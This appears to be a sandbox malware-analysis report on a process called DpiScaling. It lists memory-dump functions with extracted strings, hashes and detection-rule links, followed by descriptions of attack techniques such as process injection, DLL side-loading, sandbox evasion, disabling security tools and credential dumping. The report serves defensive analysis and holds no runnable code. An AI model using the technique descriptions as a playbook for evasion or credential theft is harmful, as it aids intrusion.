String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: a5d8b591a12bf4ea40b691262310355cf58366af5c12575b306bfe81920b8f1f
Instruction ID: 6fed6f1ff9ed8e3a05c1a5402e330a0ee8d2122aa82d361a2ffd653ce79b9c39
Opcode Fuzzy Hash: a5d8b591a12bf4ea40b691262310355cf58366af5c12575b306bfe81920b8f1f
Instruction Fuzzy Hash: BD915FF04482988EC7158F55A0652AFFFB1EBC6305F15816DE7A6BB243C3BE89058B85

Function 045C3B4F Relevance: 21.3, Strings: 17, Instructions: 67COMMON

Download Yara Rule

Strings

x413, xrefs: 045C3C01
vjlh, xrefs: 045C3C2B
,wmk, xrefs: 045C3BE5
kvik, xrefs: 045C3C32
75=w, xrefs: 045C3C1D
lvlv, xrefs: 045C3B9F
llvh, xrefs: 045C3C24
mkov, xrefs: 045C3C55
449w, xrefs: 045C3B70
ovkn, xrefs: 045C3BEC
aiax, xrefs: 045C3BB4
71<x, xrefs: 045C3B98
9*1w, xrefs: 045C3C4E
- cx, xrefs: 045C3B8A
:14=, xrefs: 045C3C40
mvhx, xrefs: 045C3B7C
;37q, xrefs: 045C3C0F

Memory Dump Source

Source File: 0000000B.00000002.2678798803.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_DpiScaling.jbxd

Similarity

API ID:
String ID: ,wmk$- cx$449w$71<x$75=w$9*1w$:14=$;37q$aiax$kvik$llvh$lvlv$mkov$mvhx$ovkn$vjlh$x413
API String ID: 0-1011141404
Opcode ID: 9ac65d4326124d99dd24aa57023913122e3e8ff5c404886ff1c2ad87570c6cf9
Instruction ID: c684c0ec430691b1287c34684bd7d51b06f03a3368c7708aecaed73d4c650864
Opcode Fuzzy Hash: 9ac65d4326124d99dd24aa57023913122e3e8ff5c404886ff1c2ad87570c6cf9
Instruction Fuzzy Hash: 133135B490474DEBCB149F88D445ADE7BB1FF01358F81845DE8097B385C7398669CB8A

Function 04772890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0477293C
___swprintf_l.LIBCMT ref: 0477295E
___swprintf_l.LIBCMT ref: 047729A3
___swprintf_l.LIBCMT ref: 047AA52E

Strings

::%hs%u.%u.%u.%u, xrefs: 047AA527
ffff:, xrefs: 047AA504
:%u.%u.%u.%u, xrefs: 047AA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 047AA54E

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 52d94dbcbf55977ca64d69c989e1e81fadb348c5a653fafae5857697de698ed3
Instruction ID: 674e14ee550d205f7ea3b4a0fbdd6cc362e1390bcb954cae4313b52eb735c265
Opcode Fuzzy Hash: 52d94dbcbf55977ca64d69c989e1e81fadb348c5a653fafae5857697de698ed3
Instruction Fuzzy Hash: 8251D9B5B00156BFDF10DFA9889097EF7B8BB482047548269E4A5E7742E234FE54CBE0

Function 047E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 047E24A6
___swprintf_l.LIBCMT ref: 047E24E2
___swprintf_l.LIBCMT ref: 047E257D
___swprintf_l.LIBCMT ref: 047E25A3
___swprintf_l.LIBCMT ref: 047E25C8
___swprintf_l.LIBCMT ref: 047E2608

Strings

ffff:, xrefs: 047E247D, 047E249D
:%u.%u.%u.%u, xrefs: 047E25FF
::ffff:0:%u.%u.%u.%u, xrefs: 047E24DA
::%hs%u.%u.%u.%u, xrefs: 047E249E

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b727dbeab6492bf442726145f7fcbb135d94a6956753354cd631c1a8a3783b9a
Instruction ID: f1993feed6086446971138de1ae708eee86cfeb9c7eb37d3952284e13f91ded9
Opcode Fuzzy Hash: b727dbeab6492bf442726145f7fcbb135d94a6956753354cd631c1a8a3783b9a
Instruction Fuzzy Hash: 1D51E6B1A00645AFDB20DF5EC99097EB7FCAB49204B048599E496E7742EA74FE408B60

Function 04767630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 047A4742
ExecuteOptions, xrefs: 047A46A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 047A4787
Execute=1, xrefs: 047A4713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 047A4725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047A46FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 047A4655

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 29ef0d883ab0abc3f8ac4a0b0113aa2a23b49156ca7a3b54d84cd01d66ab89c7
Instruction ID: f146bfc8908fbd527fa336279a1484a3ad62130cf7d50e6f645ba6c7bfdbf32e
Opcode Fuzzy Hash: 29ef0d883ab0abc3f8ac4a0b0113aa2a23b49156ca7a3b54d84cd01d66ab89c7
Instruction Fuzzy Hash: B9512C71600219BBEF14AE69DC89FEE77ADEF08348F4401A9D906A7390E771BE458F50

Function 04806940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 97afa7df748042442f1d9a2550932f354bff79d1198363b63c843943ab8f6756
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 62023470618341AFD754CF18C894A6FBBE5EFC8714F408E2DB9859B2A4EB71E905CB42

Function 0477B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0477B6BF

Strings

0, xrefs: 0477B695
0, xrefs: 0477B66F
-, xrefs: 0477B650
+, xrefs: 0477B65A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: d5f3503aff4848e9264982ad9d30402d22fad83cb8b1fb63389ff8d7643f2fbf
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 4581D570E052499EDF24CF68C8917FEBBB5AF45328F98465AD861EB391D734B840CB90

Function 047E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 047E214F
___swprintf_l.LIBCMT ref: 047E2172

Strings

%%%u, xrefs: 047E2146
[, xrefs: 047E212B
]:%u, xrefs: 047E2169

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 9f733b8fed53c7cb55a1c981dd4c3cbd7392d26913bf34e6b2823fb53a03793a
Instruction ID: 14ad11fa0084f2be9941ce1cf5346fbfa06e7a12b66a6fcfabcae39a29420d72
Opcode Fuzzy Hash: 9f733b8fed53c7cb55a1c981dd4c3cbd7392d26913bf34e6b2823fb53a03793a
Instruction Fuzzy Hash: E6215376A00119ABDB10DEB9C844ABE77EDEF48644F550256E915E3301E731BA058BA1

Function 0475F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047A02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047A02BD
RTL: Re-Waiting, xrefs: 047A031E

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: eae26b330d84ed5d8d096ddd61e3a8d841330b2f74a261236776311d0c10c27d
Instruction ID: 8ffdd71e8053f09f60024db6de662a50718dd3324a071086a7aa5c3a0e93c9cb
Opcode Fuzzy Hash: eae26b330d84ed5d8d096ddd61e3a8d841330b2f74a261236776311d0c10c27d
Instruction Fuzzy Hash: 03E1AE306047819FD724CF28C984B6AB7E0EB88318F144A5DF9A58B3E1E7B5F955CB42

Function 0476BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 047A7B7F
RTL: Resource at %p, xrefs: 047A7B8E
RTL: Re-Waiting, xrefs: 047A7BAC

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 41c0323b6671c89cb525e04ac601259680b8d8397d1a435826bb097812bfa203
Instruction ID: 71efef50124a850162f5a43bed1378c2304b3ef54eb6cea1bf46901d889d1507
Opcode Fuzzy Hash: 41c0323b6671c89cb525e04ac601259680b8d8397d1a435826bb097812bfa203
Instruction Fuzzy Hash: A841E3713007029FD724DE29CD40BAAB7E6EF89714F100A2DE956DB790DB30F8058B91

Function 0476B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047A728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 047A7294
RTL: Resource at %p, xrefs: 047A72A3
RTL: Re-Waiting, xrefs: 047A72C1

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 7ee838d89b9030e717bb2dcedab5567733fe382eca4107ffa071d0f705675439
Instruction ID: e76309ad83933f820bbd331954c87e7bed45c921eb9e1b3c2973e2f424c6f98a
Opcode Fuzzy Hash: 7ee838d89b9030e717bb2dcedab5567733fe382eca4107ffa071d0f705675439
Instruction Fuzzy Hash: 5E41F031700212ABD724DE25CD41BAAB7B6FB85718F104629FD56EB380DB20F8529BD1

Function 047E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 047E238D
___swprintf_l.LIBCMT ref: 047E23B3

Strings

%%%u, xrefs: 047E2384
]:%u, xrefs: 047E23AA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 28736b6eff9dec88b9e38424de07ba2255ed790fa2f645ae7d8a00d6f264f0b4
Instruction ID: 263f6e46a715f245fa35953e662267e3491afe9c9747d11e2902ae892e340f87
Opcode Fuzzy Hash: 28736b6eff9dec88b9e38424de07ba2255ed790fa2f645ae7d8a00d6f264f0b4
Instruction Fuzzy Hash: CC315772600219AFDB20DE29CC44BFE77BCEB44614F554596E849E3341EB30BA448FA1

Function 04777D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04777E8B

Strings

-, xrefs: 04777DDD
+, xrefs: 04777DE8

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 5ed8425a7a6a99001290feedc142bf54a3c9db668fb36b068596c06c3f1c45f6
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: AA91B270E002069BDF28DF69C985ABEB7A5EF44320FD4491AE855EB3C0E770B941C761

Function 04739126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 04739175
$, xrefs: 04739191

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 5787140ef14c1faf848dafeef144944e89588bcb989b49b727003212be0c20ea
Instruction ID: 27b1222b25a2f3b0e17fdd0dfe2623cb44002201c12d6846bde85cb853940a82
Opcode Fuzzy Hash: 5787140ef14c1faf848dafeef144944e89588bcb989b49b727003212be0c20ea
Instruction Fuzzy Hash: 90812BB2D002699BDB31DF54CD44BEAB7B4AB48714F0045DAEA09B7781E7706E84CFA0

Function 047BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 047BCFBD

Strings

@, xrefs: 047BCF0A
@4Qw@4Qw, xrefs: 047BCFD5, 047BCFDA, 047BCFF1

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: e278d660e340a70fb1bc6f394f75d03324021d695dc1a9aa32fed9b4ad1ecec2
Instruction ID: 26527ab2a309f9e82aba13f2c7ccebfe5baa8028bd65c6a73c72ead7a8a4833f
Opcode Fuzzy Hash: e278d660e340a70fb1bc6f394f75d03324021d695dc1a9aa32fed9b4ad1ecec2
Instruction Fuzzy Hash: BE41D371A00624DFDB319FA9D944BADBBB8FF44708F00496AE955EB350D734E841CBA0

Function 045C39B0 Relevance: 5.0, Strings: 4, Instructions: 34COMMON

Download Yara Rule

Strings

~r67, xrefs: 045C39C7
4>3&, xrefs: 045C39D4
7, xrefs: 045C39DC
5(;", xrefs: 045C39E4

Memory Dump Source

Source File: 0000000B.00000002.2678798803.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_DpiScaling.jbxd

Similarity

API ID:
String ID: 4>3&$5(;"$7$~r67
API String ID: 0-3727003070
Opcode ID: 596c6ffd817cf94aec252ddebc447bfe025ba228ef186448957f87c7d95ff4cf
Instruction ID: 57ad5a48db6ab1a9dbb745a861abc353a66cde694c76198cecfc2b6808fb179e
Opcode Fuzzy Hash: 596c6ffd817cf94aec252ddebc447bfe025ba228ef186448957f87c7d95ff4cf
Instruction Fuzzy Hash: 78F0B4351287889BCB04AF54C484596B7E1FFC930CF84469DE88EDB150DA359606CF4A

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

